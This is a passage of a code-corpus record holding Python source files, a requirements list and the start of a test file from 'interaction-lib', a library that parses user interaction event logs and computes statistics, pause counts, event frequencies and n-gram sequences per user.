events_beyond_max_frequency = False\n\n previous_ts = None\n seen_hidden = False\n missing_visibility_change = False\n for idx, event in enumerate(events):\n # if it's the first loop, previous ts will be none\n if idx == 0: previous_ts = event['timestamp']\n\n hidden = 0 # record amount of time hidden, to subtract later\n if (event['action_name'] == 'BROWSER_VISIBILITY_CHANGE' and\n event['data']['romper_to_state'] == 'hidden'):\n hidden_ts = event['timestamp']\n\n hidden = get_hidden_time(hidden_ts, idx, events)\n seen_hidden = True\n elif (event['action_name'] == 'BROWSER_VISIBILITY_CHANGE' and \n event['data']['romper_to_state'] == 'visible' and\n not seen_hidden):\n visible_ts = event['timestamp']\n\n # find the missing hidden visibility change\n hidden = missing_hidden_visibility_change(visible_ts, idx, events)\n seen_hidden = False # ensure that this is false\n \n # flag that this data querk has happened\n missing_visibility_change = True \n \n # update the elapsed time and subtract any hidden time\n elapsed_time += (event['timestamp'] - previous_ts).total_seconds()\n elapsed_time -= hidden\n \n between_threshold = min_threshold <= elapsed_time < max_threshold\n\n # if the elapsed time is between the min and max threshold\n if (between_threshold and event['id'] not in previous_subset_ids):\n events_subset.append(event)\n # else if the value isn't between the threshold, the data querk happened\n # and the event hasn't been previously seen\n elif (not between_threshold and missing_visibility_change and \n event['id'] not in previous_subset_ids):\n events_subset.append(event)\n missing_visibility_change = False\n\n previous_ts = event['timestamp']\n\n # condition two: check if the user has events beyond the maximum threshold\n if elapsed_time < max_threshold:\n events_beyond_max_frequency = True\n\n return events_subset, events_beyond_max_frequency\n\n def _get_frequencies(user_chunk, data_chunk):\n user_dict = {user: [] for user in user_chunk}\n for d in data_chunk: user_dict[d['user']].append(d)\n\n results = {user: {} for user in user_chunk}\n\n for user, events in user_dict.items():\n if len(events) < 1: # the user has no events\n continue\n \n subset_ids = set([])\n for idx, i in enumerate(range(len(frequencies) - 1)):\n event_subset, events_beyond_max_freq = _subset(\n frequencies[i], frequencies[i + 1], events,\n previous_subset_ids = subset_ids\n )\n\n # ids in subset\n subset_ids.update([ev['id'] for ev in event_subset])\n \n \"\"\" \n Two exit conditions:\n 1) the user has no events left\n 2) they have events but are beyond the current\n max frequency. \n \"\"\"\n # if the length is zero and there's no events beyond the current\n # max frequency (frequencies[i + 1])\n if (len(event_subset) == 0 and not events_beyond_max_freq):\n break # there's no more events\n\n ua_counter = defaultdict(int) # counter for all events\n \n # set the default for each of the events\n for event in interaction_events: ua_counter[event] = 0\n\n for event in event_subset: # ignoring segmentCompletions events\n if event['action_type'] == 'segmentCompletion': continue\n if event['action_name'] in interaction_events:\n ua_counter[event['action_name']] += 1\n\n # if pauses need to be included\n if include_pauses:\n for pause in ['SP', 'MP', 'LP', 'VLP']:\n ua_counter[pause] = 0\n\n for pause, count in self._pause_counts(event_subset):\n ua_counter[pause] = count\n\n # need to drop the first play pause, it always happens at the start\n if idx == 0 and ua_counter['PLAY_PAUSE_BUTTON_CLICKED'] != 0:\n ua_counter['PLAY_PAUSE_BUTTON_CLICKED'] -= 1\n\n results[user][str(frequencies[i]) + '_' + str(frequencies[i + 1])] = dict(ua_counter)\n\n return results\n \n if not isinstance(frequencies, list):\n raise TypeError('Event Frequencies should be a list of second intervals: {0} ({1}'\n .format(\n frequencies, type(frequencies) \n )\n )\n \n if len(frequencies) == 0:\n raise ValueError('Event frequencies cannot be an empty list: {0}'.format(frequencies))\n\n if not all(isinstance(x, (int, float)) for x in frequencies):\n raise TypeError('Contents of event frequencies are not ints or floats.')\n\n if not self._user_event_frequencies:\n if user_id is not None: # if a specific user is requested\n if not isinstance(user_id, str):\n raise TypeError('User ID should be a string: {0} ({1})'.format(\n user_id, type(user_id)))\n\n if user_id not in self.data.keys():\n raise ValueError('Invalid user ID: {0}'.format(user_id))\n\n return _get_frequencies(\n user_chunk = [user_id], data_chunk = self.data[user_id])[user_id]\n\n self._user_event_frequencies = {user: {} for user, d in self.data.items()}\n parallel = Parallel(n_jobs = self._num_cpu, verbose = verbose)\n\n # run the event frequencies in parallel\n results = parallel(delayed(_get_frequencies) (u, e) for u, e in self._split_users())\n\n # unpack the results and add the frequencies into the dictionary\n for res in results:\n for user, event_freq in res.items():\n self._user_event_frequencies[user].update(event_freq)\n\n return self._user_event_frequencies \n else:\n if user_id is not None: # if a specific user is requested\n if not isinstance(user_id, str):\n raise TypeError('User ID should be a string: {0} ({1})'.format(\n user_id, type(user_id)))\n\n if user_id not in self.data.keys():\n raise ValueError('Invalid User ID: {0}'.format(user_id))\n\n return self._user_event_frequencies[user_id]\n return self._user_event_frequencies\n\n \n def calculate_statistics(\n self, \n interaction_events: List[str],\n user_id: Optional[str] = None,\n include_link_choices: Optional[bool] = False,\n pauses_include_events: Optional[Set] = {},\n pauses_exclude_events: Optional[Set] = {},\n include_user_set_variables: Optional[bool] = False,\n verbose: Optional[int] = 0\n ) -> Dict[str, Dict[str, Union[int, float]]]:\n \"\"\" \n The main function for calculating all statistics, excluding the \n event frequencies.\n\n :params interaction_events: a list of events that you want to\n track in the statistics\n :params user_id: a specific user to calculate statistics for\n :params include_link_choices: whether to include LC in the statistics\n :params pauses_include_events: a set of events to include outside of the standard\n USER_ACTION events, i.e., browser visibility and window orientation changes\n :params pauses_exclude_events: a set of events to exclude from the pause calculations.\n :params include_user_set_variables: whether to include USV in the statistics\n :params verbose: verbosity level passed to joblib backend\n :returns: a dictionary containing a mapping from users to their\n respective statistics.\n \"\"\"\n\n # check that the interaction events is a set\n if not isinstance(interaction_events, set):\n raise TypeError('Interaction events should be a set of actions: {0} ({1})'.format(\n interaction_events, type(interaction_events))\n )\n\n if len(interaction_events) == 0:\n raise ValueError('Interaction events cannot be empty: {0}'.format(interaction_events))\n\n # test that the values in a set are of type string, the process won't work with int/float\n if not all(isinstance(x, str) for x in interaction_events):\n raise TypeError('Contents of interaction_events is not string')\n \n if not self._statistics: # haven't been previously calculated\n if user_id is not None: # if statistics for a single user is requested\n if not isinstance(user_id, str):\n raise TypeError('User ID should be a string: {0} ({1})'.format(user_id, type(user_id)))\n\n if user_id not in self.data.keys():\n raise ValueError('Invalid User ID: {0} ({1})'.format(user_id, type(user_id)))\n\n # return a dict of results = {total_events: 24, pp: 1, etc..}\n individual_results = {\n **self.time_statistics(user_id = user_id, verbose = verbose),\n **self.pause_statistics(\n user_id = user_id, \n pauses_include_events = pauses_include_events,\n pauses_exclude_events = pauses_exclude_events, \n verbose = verbose\n ),\n **self.event_statistics(\n interaction_events, user_id = user_id,\n include_link_choices = include_link_choices,\n include_user_set_variables = include_user_set_variables, \n verbose = verbose\n )\n }\n \n return individual_results\n\n # ---- The below may not be the most optimal approach -----\n\n # first calculate all of the statistics individually\n self.time_statistics(verbose = verbose)\n self.pause_statistics(\n pauses_include_events = pauses_include_events,\n pauses_exclude_events = pauses_exclude_events, \n verbose = verbose\n )\n self.event_statistics(\n interaction_events = interaction_events,\n include_link_choices = include_link_choices,\n include_user_set_variables = include_user_set_variables,\n verbose = verbose\n )\n \n for user in self._users: # build up the statistics dictionary\n self._statistics[user] = {}\n self._statistics[user].update(self._time_statistics[user])\n self._statistics[user].update(self._pause_statistics[user])\n self._statistics[user].update(self._event_statistics[user])\n\n return self._statistics\n else: # else, the statistics have been previously calculated\n if user_id is not None: # if it's for a specific user\n if not isinstance(user_id, str): \n raise TypeError('User ID should be a string: {0} ({1})'.format(user_id, type(user_id)))\n \n if user_id not in self.data.keys():\n raise ValueError('Invalid User ID: {0} ({1})'.format(user_id, type(user_id)))\n\n return self._statistics[user_id]\n\n return self._statistics\n\n" }, { "alpha_fraction": 0.5946372151374817, "alphanum_fraction": 0.602523684501648, "avg_line_length": 32.342105865478516, "blob_id": "307f0b68d559ec4381b814a2c668d94aaaa0b1c6", "content_id": "8338e1f0ecc201d7530c11cd59029ec9b71bf4f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1268, "license_type": "no_license", "max_line_length": 83, "num_lines": 38, "path": "/interlib/util/helpers.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "\"\"\"\nHelper functions for processing the data\n\"\"\"\nfrom datetime import datetime as dt\nimport json\n\n############################\n# Common statistical tasks\n############################\n\ndef get_hidden_time(hidden_ts, current_index, events):\n if (current_index + 1) == len(events): return 0\n\n visible_ts = None\n if (events[current_index + 1]['action_name'] == 'BROWSER_VISIBILITY_CHANGE' and\n events[current_index + 1]['action_name'] == 'visible'):\n visible_ts = events[current_index + 1]['timestamp']\n else:\n for f_idx, f_event in enumerate(events[current_index:]):\n if (f_event['action_name'] == 'BROWSER_VISIBILITY_CHANGE' and \n f_event['data']['romper_to_state'] == 'visible'):\n visible_ts = f_event['timestamp']\n break\n\n if visible_ts:\n return (visible_ts - hidden_ts).total_seconds()\n return 0 # couldn't find the issue\n\ndef missing_hidden_visibility_change(visbile_ts, current_index, events):\n # nothing we can do at the start of the list\n if current_index == 0: return 0 \n\n pseudo_hidden_ts = events[current_index - 1]['timestamp']\n \n return (visbile_ts - pseudo_hidden_ts).total_seconds()\n\ndef safe_division(n, d):\n return n / d if d else 0\n\n" }, { "alpha_fraction": 0.631147563457489, "alphanum_fraction": 0.631147563457489, "avg_line_length": 14.375, "blob_id": "d2eb070ba9f8c0ad338316276adb73c4f840c350", "content_id": "3103eb6bfba4d315b2a50d8f442b5a5ec1159a54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 122, "license_type": "no_license", "max_line_length": 45, "num_lines": 8, "path": "/interlib/util/__init__.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "\"\"\" \nUtility functions and helpers for the library\n\"\"\"\n\n# ----- Imports ------\n\nfrom .helpers import *\nfrom .data import *" }, { "alpha_fraction": 0.5265215039253235, "alphanum_fraction": 0.5287548899650574, "avg_line_length": 38.27631759643555, "blob_id": "71049b1a812a95e80e9330d8c6bf8d4617305da2", "content_id": "ba3b5a0cc5ccd18b0f2a77faebf4a2f01d6b6afc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8955, "license_type": "no_license", "max_line_length": 97, "num_lines": 228, "path": "/interlib/preprocessing/sequences.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\n\nfrom .base import BaseExtractor\nfrom ._event_handler import EventHandler\n\nfrom datetime import datetime as dt\nfrom collections import Counter, defaultdict\nfrom typing import Optional, Union, List, Set, Dict, Counter\nfrom joblib import Parallel, delayed\nfrom nltk import ngrams\n\n\nclass SequenceError(Exception):\n \"\"\" \n Custom error to raise when the sequences do not exist\n but the user is requesting an action to be performed\n using the sequences.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\nclass Sequences(BaseExtractor):\n\n def __init__(self, user_event_dict, completion_point=None, n_jobs=-1):\n super().__init__(user_event_dict, completion_point=completion_point, n_jobs=n_jobs)\n\n self._sequences = {}\n\n def _compress_events(self, sequence: List[str], compress_event: str = 'NEC') -> List[str]:\n \"\"\" \"\"\"\n if len(sequence) == 0:\n return sequence\n\n updated_sequence = []\n just_seen_event = False\n for indx, event in enumerate(sequence): # for each event in the sequence\n\n # if the event is the event to be compressed and we've not just seen it\n if event == compress_event and not just_seen_event:\n count = 1\n for other_event in sequence[(indx + 1): ]: # scan forward to count\n if other_event == compress_event: count += 1\n else: break\n \n just_seen_event = True # indicate that we've just seen it\n updated_sequence.append(event + '_' + str(count)) # event_count format\n \n # if we've not just seen the event, the append the next one\n if not just_seen_event:\n updated_sequence.append(event)\n \n # if we have just seen the event and the event isn't the compress event\n if just_seen_event and event != compress_event:\n updated_sequence.append(event)\n just_seen_event = False # set just seen to false\n \n return updated_sequence\n\n def _categorize_sequence(self, sequence: List[str], categories: Dict[str, str]) -> List[str]:\n \"\"\" TODO \"\"\"\n pass\n\n def get_sequences(\n self,\n interaction_events: Set[str],\n aliases: Dict[str, str],\n user_id: Optional[str] = None,\n compress: Optional[bool] = True,\n compress_event: Optional[str] = None,\n categories: Optional[Dict[str, str]] = None,\n time_threshold: Optional[Union[float, int]] = None,\n verbose: Optional[int] = 0\n ) -> Dict[str, Dict]:\n \"\"\" \n \n :params time_threshold: upper limit in seconds (not minutes!)\n \"\"\"\n def _seq(user_chunk, data_chunk, e_handler):\n user_dict = {user: [] for user in user_chunk}\n for d in data_chunk: user_dict[d['user']].append(d)\n\n results = {user: [] for user in user_chunk}\n nec = 'NARRATIVE_ELEMENT_CHANGE'\n\n for user, events in user_dict.items():\n if len(events) < 1: # if there is no events, just continue\n continue\n \n if time_threshold:\n first_event_ts = None\n\n previous_timestamp = None \n for idx, event in enumerate(events): # for each event in the users events\n if idx == 0: # if it's the first timestamp\n first_event_ts = event['timestamp']\n \n # if the event is one that should be captured\n if event['action_name'] in interaction_events:\n \n # pauses are tracked between the events that are being tracked and\n # that are to be included in the sequence\n if previous_timestamp == None: \n previous_timestamp = event['timestamp']\n \n pause_type, _ = self._type_of_pause(\n previous_timestamp, event['timestamp']\n )\n if pause_type != 0:\n results[user].append(pause_type)\n previous_timestamp = event['timestamp']\n\n results[user].append(e_handler.process_event(event))\n \n if (time_threshold and \n (event['timestamp'] - first_event_ts).total_seconds() > time_threshold):\n # if we've hit the threshold provided\n break\n \n if compress:\n results[user] = self._compress_events(results[user], compress_event)\n \n if categories:\n results[user] = self._categorize_sequence(results[user], categories)\n\n e_handler = e_handler.reset()\n\n return results\n\n # ERROR CHECKING\n if not isinstance(interaction_events, set):\n raise TypeError(\n f\"interaction_events should be a set, current type: {type(interaction_events)}\"\n )\n \n if not isinstance(aliases, dict):\n raise TypeError(f\"aliases should be a dict, current type: {type(aliases)}\")\n\n # check that all interaction events are in the aliases\n if not set(interaction_events) == set(aliases.keys()):\n raise ValueError('interaction events and aliases keys should be the same')\n\n if not self._sequences:\n if user_id is not None: \n if not isinstance(user_id, str):\n raise TypeError('user_id should be a string: {0} (type: {1})'.format(\n user_id, type(user_id)\n ))\n\n if user_id not in self._users:\n raise ValueError('Invalid user_id: {0}'.format(user_id))\n\n e_handler = EventHandler(aliases)\n return _seq(\n user_chunk = [user_id], \n data_chunk = self.data[user_id],\n e_handler = e_handler)[user_id]\n \n self._sequences = {user: [] for user in self._users}\n parallel = Parallel(n_jobs = self._num_cpu, verbose = verbose)\n\n e_handler = EventHandler(aliases)\n\n # runs the _seq function in parallel\n res = parallel(delayed(_seq) (u, e, e_handler) for u, e in self._split_users())\n\n # unpack the results and add them to the sequences dict\n for r in res:\n for u, s in r.items():\n self._sequences[u] = s\n\n return self._sequences\n else:\n if user_id is not None:\n if not isinstance(user_id, str):\n raise TypeError('user_id should be a string: {0} (type: {1}'.format(\n user_id, type(user_id)\n ))\n\n if user_id not in self._users:\n raise ValueError('Invalid user_id: {0}'.format(user_id))\n\n return self._sequences[user_id]\n return self._sequences\n\n def get_ngrams(\n self, \n n: Optional[int] = 3,\n counter: Optional[bool] = False, \n ) -> Union[List, Counter]:\n \"\"\" \n - if get_sequences hasn't be called, then we propagate an error.\n - should provide the option to say what the N is\n - Return just the ngrams or a counter object\n \"\"\"\n if not self._sequences:\n raise SequenceError(\n 'Sequences have not been extracted, call the '\n 'get_sequences beforehand.'\n )\n\n if not isinstance(n, int):\n raise TypeError('n should be an int: {0} (type: {1}'.format(n, type(n)))\n\n if not isinstance(counter, bool):\n raise TypeError(\n 'counter should be a bool: {0} (type: {1})'.format(counter, type(counter)))\n\n # Get the n-grams for all of the users\n ngrams_dict = defaultdict(list) # {user_id -> [n_grams, ...], ...}\n for user, sequence in self._sequences.items():\n calculate_ngrams = ngrams(sequence, n) # get the ngrams for this sequence\n for each_gram in calculate_ngrams:\n ngrams_dict[user].append(each_gram) # append each gram\n\n counts = Counter() # Count the n-grams (across all n-grams)\n user_counts = defaultdict(Counter) # Count the n-grams (for each user)\n for user, all_grams in ngrams_dict.items():\n # update the counter with the current list of n-grams\n counts.update(all_grams)\n user_counts[user].update(all_grams)\n\n if counter:\n return ngrams_dict, counts, user_counts\n else:\n return ngrams_dict\n" }, { "alpha_fraction": 0.5930683612823486, "alphanum_fraction": 0.5950934290885925, "avg_line_length": 38.07466125488281, "blob_id": "9d1e55cc673ae48c6a3db8809a5d4c5d445f732d", "content_id": "aa8c99924d7b317a447b5c98a121d92d5c0304c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17283, "license_type": "no_license", "max_line_length": 99, "num_lines": 442, "path": "/interlib/util/data.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "\"\"\" \nUtility functions for processing raw data.\n\"\"\"\n\nfrom typing import (\n Optional,\n Union, \n List,\n Dict,\n Set\n)\nfrom datetime import datetime as dt\n\nimport json, os\nimport numpy as np\nimport pandas as pd \n\n\ndef parse_raw_data(\n raw_data: List[Dict], \n datetime_format: str = \"%Y-%m-%d %H:%M:%S.%f\", \n include_narrative_element_id: bool = False\n) -> List[Dict]:\n \"\"\"\n Given a list of raw data, parse it into the format that is used\n to user events.\n\n :params raw_data: a list of events (dictionaries)\n :params datetime_format: the format to parse the timestamp string\n :params include_narrative_element_id: do you want to include this field\n :returns: data parsed as a list of events\n \"\"\"\n parsed_data = []\n\n for datum in raw_data:\n # parse the message data\n if 'message' in datum.keys():\n parse_message = json.loads(datum['message'])\n else:\n parse_message = json.loads(datum['data'])\n nested_data = {}\n for key in parse_message:\n nested_data[key] = parse_message[key]\n\n # parse the timestamp into a datetime object\n timestamp = datum['timestamp']\n if len(timestamp) < 24: timestamp = timestamp + '.000'\n timestamp = dt.strptime(timestamp[:23], datetime_format)\n\n p_data = {\n 'id': datum['id'], 'user': datum['userid'],\n 'timestamp': timestamp, 'action_type': datum['item'],\n 'action_name': datum['action'], 'data': nested_data\n }\n\n if include_narrative_element_id:\n p_data.update({'narrative_element': datum['narrative_element']})\n\n parsed_data.append(p_data)\n\n return parsed_data\n\n\ndef parse_timestamp(\n data: List[Dict], \n datetime_format: str = \"%Y-%m-%d %H:%M:%S.%f\"\n) -> List[Dict]:\n \"\"\"\n A function to parse the timestamp field into datetime objects\n\n :params data: un-parsed data, a list of dictionaries\n :params datetime_format: the format for the datetime object\n :returns: updated data parameter\n \"\"\"\n for event in data:\n timestamp = event['timestamp']\n if len(timestamp) < 24: timestamp = timestamp + '.000'\n event.update(\n (k , dt.strptime(timestamp[:23], datetime_format))\n for k, v in event.items() if k == 'timestamp'\n )\n return data\n\n\ndef _get_users_clicked_start_button(events):\n \"\"\"\n Fetches the set of users that have clicked the start\n button. This functionality is needed as the users that\n haven't clicked the start button haven't agreed to their\n data being processed.\n\n :params events: all captured events\n :returns: a set of users that clicked the start button.\n \"\"\"\n return set([\n event['user'] for event in events if event['action_name'] == 'START_BUTTON_CLICKED'\n ])\n\ndef to_dict(\n path: str, \n split: Optional[Union[bool, int]] = None,\n datetime_format: Optional[str] = \"%Y-%m-%d %H:%M:%S.%f\",\n include_narrative_element_id: Optional[bool] = False,\n sort: Optional[bool] = True,\n users_to_include: Optional[Set[str]] = None,\n start_button_filter: Optional[bool] = True,\n already_parsed: Optional[bool] = False\n) -> Union[Dict[str, List], List[Dict[str, List]]]:\n \"\"\"\n Utility function to convert a raw dataset (in a json export from DB\n format) to the format that is internally used: {user -> events}\n\n :params path: the path to the data file (json)\n :params split: whether the data should be split (into 2, default) or\n the number of splits requested\n :params datetime_format: the format for the timestamp, compatiable with\n datetime\n :params include_narrative_element: whether to include narrative element\n changes\n :params sort: whether or not to sort the data by the timestamp.\n :params users_to_include: a subset of user_ids that you want to extract the data for\n :params start_button_filter: only include users that have clicked the Start button, \n indicating that they have accepted the data collection policy.\n :returns: dictionary of values: {user -> events} or, if split, then\n a list of dictionaries in [{user -> events}] format\n \"\"\"\n if not isinstance(path, str):\n raise TypeError('Path is not a string: {0} ({1})'.format(path, type(path)))\n\n if not os.path.isfile(path):\n raise ValueError('File does not exist: {0}'.format(path))\n\n if split and not isinstance(split, (bool, int)):\n raise TypeError('Split must be a bool (uses default split of 2) or int ',\n '(the number of splits): {0} ({1})'.format(split, type(split)))\n \n if not isinstance(include_narrative_element_id, bool):\n raise TypeError('include_narrative_element_id is not a bool: {0} ({1})'.format(\n include_narrative_element_id, type(include_narrative_element_id) \n ))\n\n if not isinstance(sort, bool):\n raise TypeError('sort is not a bool: {0} ({1})'.format(sort, type(sort)))\n\n with open(path, 'r') as in_file: # read in the data provided\n if already_parsed:\n data = parse_timestamp(json.load(in_file), datetime_format)\n else:\n data = parse_raw_data( # parse into our internal format at the same time\n json.load(in_file), \n datetime_format, \n include_narrative_element_id\n )\n \n if start_button_filter:\n clicked_start_button = _get_users_clicked_start_button(data)\n\n if split:\n if isinstance(split, bool): # if it's a bool\n split = 2 # then just use 2 as the default\n \n # create a list of all user ids\n if users_to_include: # if we're looking for a subset\n user_ids = []\n for event in data:\n if (event['user'] in users_to_include and event['user'] in clicked_start_button):\n user_ids.append(event['user'])\n else: # otherwise, it's everyone\n user_ids = [event['user'] for event in data]\n\n # partition the user id's into the split value\n split_users = np.array_split(user_ids, split)\n split_list = []\n for item in split_users:\n split_list.append(set(item))\n \n main_list = []\n for part in split_list:\n segment = []\n\n for event in data:\n if event['user'] in part:\n segment.append(event)\n\n main_list.append(segment)\n\n # transform into the {user -> events} format\n events = []\n for d in main_list:\n # get all of the users in the segment and build a user event dict\n user_ids = {event['user'] for event in d}\n user_events = {id: [] for id in user_ids}\n\n for event in d: # for each event\n if event['user'] in user_ids: # if that user is in this segment\n user_events[event['user']].append(event)\n \n if sort: # if sort, then sort by timestamp\n for user in user_events.copy().keys():\n user_events[user] = sorted(user_events[user], key = lambda x: x['timestamp'])\n\n\n # for user, event in user_events.copy().items():\n # user_events[user] = sorted(user_events[user], key = lambda x: x['timestamp'])\n \n # build the returned list\n events.append(user_events)\n\n return events\n else:\n if users_to_include:\n user_ids = {\n event['user'] for event in data if event['user'] in users_to_include\n }\n else:\n user_ids = {event['user'] for event in data}\n\n if start_button_filter:\n clicked_start_button = _get_users_clicked_start_button(data)\n\n # build up the user events dict {user -> [events]}\n user_events = {id: [] for id in user_ids}\n\n if start_button_filter:\n for event in data:\n if (event['user'] in user_ids and event['user'] in clicked_start_button):\n user_events[event['user']].append(event)\n else:\n for event in data:\n if event['user'] in user_ids:\n user_events[event['user']].append(event)\n \n if sort:\n # sort the events by the timestamp\n for user, events in user_events.copy().items():\n user_events[user] = sorted(events, key = lambda x: x['timestamp'])\n\n return user_events\n\ndef to_dataframe(\n result_dictionary: Dict[str, Dict], \n key_name: Optional[str] = 'user'\n) -> pd.DataFrame:\n \"\"\" \n Given a dictionary of results, from the statistics package,\n convert it into a pandas dataframe format.\n\n :params result_dictionary: dictionary created as a result of calculating statistics\n :params key_name: what the index should be renamed to when the dataframe is reset\n :returns: pandas DataFrame\n \"\"\"\n if not isinstance(result_dictionary, dict):\n raise TypeError(f\"result_dictionary should be a dictionary and be the output from the \" +\n f\"Statistics package, current type: {type(result_dictionary)}\")\n\n return pd.DataFrame.from_dict(\n result_dictionary, orient = 'index'\n ).reset_index().rename(columns = {'index': key_name})\n\n# TODO function to get the set of users that reached a particular\n# point in the story (check seen_introduction in stats_time_thresholds.py)\n\ndef reached_point(\n user_events: Dict[str, List],\n point: str,\n filter: Optional[bool] = False\n) -> Union[Set[str], Dict[str, List]]:\n \"\"\"\n From a dictionary (user_id mapped to a list of events), find\n which users have passed through a particular point in the experience.\n\n The function also provides the ability to filter out users \n that haven't passed through this point. This will return an updated\n version of the user_events parameter\n\n :params user_events:\n :params point:\n :params filter:\n :returns:\n \"\"\"\n if not isinstance(user_events, dict): \n raise ValueError(f\"user_events must be a dictionary (current type: {type(user_events)}\")\n elif len(user_events) == 0:\n raise ValueError(f\"user_events is empty (len = {len(user_events)}\")\n elif not all(isinstance(l, list) for l in user_events.values()):\n raise ValueError(f\"the values in user_events should be lists of events\")\n\n users_to_remove = set([])\n for user, events in user_events.items():\n # collect the narrative element changes into a list\n ne_changes = [nec for nec in events if nec['action_type'] == 'STORY_NAVIGATION']\n\n # indicators for: moving to the node and out of the node\n to_state = False \n from_state = False \n\n for nec in ne_changes:\n if nec['data']['romper_to_state'] == point:\n to_state = True \n if nec['data']['romper_from_state'] == point:\n from_state = True \n \n # if either are false, then the user didn't pass through this point\n if not to_state or not from_state:\n users_to_remove.add(user)\n\n # if we're asked to filter users out\n if filter:\n # then we'll remove these users from a copy of the events (avoids mutating the original)\n user_events_copy = user_events.copy()\n for user in users_to_remove:\n user_events_copy.pop(user, None)\n \n return user_events_copy\n \n # otherwise, we need to get the difference and return the users that passed through.\n return set(user_events.keys()) - users_to_remove\n\ndef events_between_two_points(\n user_events: Dict[str, List], \n start_point: str, \n end_point: str, \n filter: bool = False,\n using_representation_id: bool = False\n) -> Dict[str, List]:\n \"\"\"\n Given all of the user events, return a filtered set of user events that were\n triggered between two points. This is useful for extracting events that occur\n during the substories of Click.\n\n TODO: implement the option to use representation ids rather than romper_to_states\n\n :params user_events: dictionary of user events ({user -> [events]})\n :params start_point: romper_to_state value\n :params end_point: romper_to_state value\n :params filter: remove users with empty event lists (default = False)\n :params using_representation_id: in newer experiences, each node is given a unique\n representation id, if you're passing ids to the start_point and end_point parameters\n then you need to set this to true (default = False)\n :returns: dictionary of user events\n \"\"\"\n if not isinstance(user_events, dict): \n raise ValueError(f\"user_events must be a dictionary (current type: {type(user_events)}\")\n elif len(user_events) == 0:\n raise ValueError(f\"user_events is empty (len = {len(user_events)}\")\n elif not all(isinstance(l, list) for l in user_events.values()):\n raise ValueError(f\"the values in user_events should be lists of events\")\n\n # add all users to dictionary with empty lists\n events_subset = {user: [] for user in user_events.keys()}\n\n for user, events in user_events.items():\n # find the starting point index\n start_idx = None \n for idx, event in enumerate(events):\n if (event['action_type'] == 'STORY_NAVIGATION' and \n event['data']['romper_to_state'] == start_point and \n not using_representation_id\n ):\n start_idx = idx \n break\n elif (event['action_type'] == 'STORY_NAVIGATION' and \n using_representation_id and \n event['data']['current_narrative_element'] == start_point\n ):\n start_idx = idx \n break \n \n # iterate from that index, adding events until you reach the end\n if start_idx is not None:\n for idx, event in enumerate(events[start_idx:]):\n # is the current event the one where they move to the end point?\n if (event['action_type'] == 'STORY_NAVIGATION' and \n event['data']['romper_to_state'] == end_point and \n not using_representation_id\n ):\n events_subset[user].append(event) # add the event\n break # exit, we've reached the endpoint\n elif (event['action_type'] == 'STORY_NAVIGATION' and \n using_representation_id and \n event['data']['current_narrative_element'] == end_point\n ):\n events_subset[user].append(event) # add the event \n break # exit, we've reached the end point\n else:\n events_subset[user].append(event)\n \n if filter: # if we're asked to remove empty lists\n return {\n user: events \n for user, events in events_subset.items() # for all users -> events\n if events # if the list contains some events\n }\n else:\n return events_subset\n\ndef events_to_threshold(\n user_events: Dict[str, List],\n threshold: Union[int, float],\n) -> Dict[str, List]:\n \"\"\"\n Given a dictionary of user events, filter the events down to\n those that happen up until the threshold. For example, if the\n threshold is set to 300 (indicating 5 minutes), then the function\n return a dictionary contain the users' events up until the 5 minute\n threshold.\n\n There is an assumption that all of the users in the dictionary have been\n pre-filtered to only include those that got up to, or past, the threshold.\n\n :params user_events:\n :params threshold:\n :returns:\n \"\"\"\n if not isinstance(user_events, dict): \n raise ValueError(f\"user_events must be a dictionary (current type: {type(user_events)}\")\n elif len(user_events) == 0:\n raise ValueError(f\"user_events is empty (len = {len(user_events)}\")\n elif not all(isinstance(l, list) for l in user_events.values()):\n raise ValueError(f\"the values in user_events should be lists of events\")\n\n filtered_user_events = {}\n for user, events in user_events.items():\n events_threshold = []\n first_event_timestamp = None \n \n for event in events:\n if first_event_timestamp is None:\n first_event_timestamp = event['timestamp']\n events_threshold.append(event)\n continue \n \n # if the difference between the first and current event is greater than the threshold\n if (event['timestamp'] - first_event_timestamp).total_seconds() > threshold:\n events_threshold.append(event)\n break # exit as we've met the threshold\n else:\n events_threshold.append(event)\n\n filtered_user_events[user] = events_threshold\n\n return filtered_user_events \n" }, { "alpha_fraction": 0.45390069484710693, "alphanum_fraction": 0.673758864402771, "avg_line_length": 14.703703880310059, "blob_id": "3fa40b3549b865c6cae0665db467d01fd75ebbe4", "content_id": "3ba1c01fe60c9acbf8829be2a32cda023cb98eaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 423, "license_type": "no_license", "max_line_length": 25, "num_lines": 27, "path": "/requirements.txt", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "astroid==2.3.3\nattrs==19.3.0\ncertifi==2020.4.5.1\ncoverage==5.1\nimportlib-metadata==1.6.0\nisort==4.3.21\njoblib==0.14.1\nlazy-object-proxy==1.4.3\nmccabe==0.6.1\nmore-itertools==8.2.0\nnumpy==1.18.1\npackaging==20.3\npandas==1.0.3\npluggy==0.13.1\npy==1.8.1\npylint==2.4.4\npyparsing==2.4.7\npytest==5.4.1\npython-dateutil==2.8.1\npytz==2019.3\nscipy==1.4.1\nsix==1.14.0\ntyped-ast==1.4.1\nwcwidth==0.1.9\nwrapt==1.12.1\nzipp==3.1.0\nnltk==3.4.5" }, { "alpha_fraction": 0.6354323625564575, "alphanum_fraction": 0.64537513256073, "avg_line_length": 34.69892501831055, "blob_id": "c247dc92dcb4bb568a6bcc219530e2d9757a3849", "content_id": "477902bf3e844a02f598f1e00bb909b6bfc191ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3319, "license_type": "no_license", "max_line_length": 76, "num_lines": 93, "path": "/tests/test_preprocessing/test_slices.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "import pytest \n\npytestmark = pytest.mark.skip(\"all tests still WIP\")\n\nimport pickle, json, datetime \nimport numpy as np 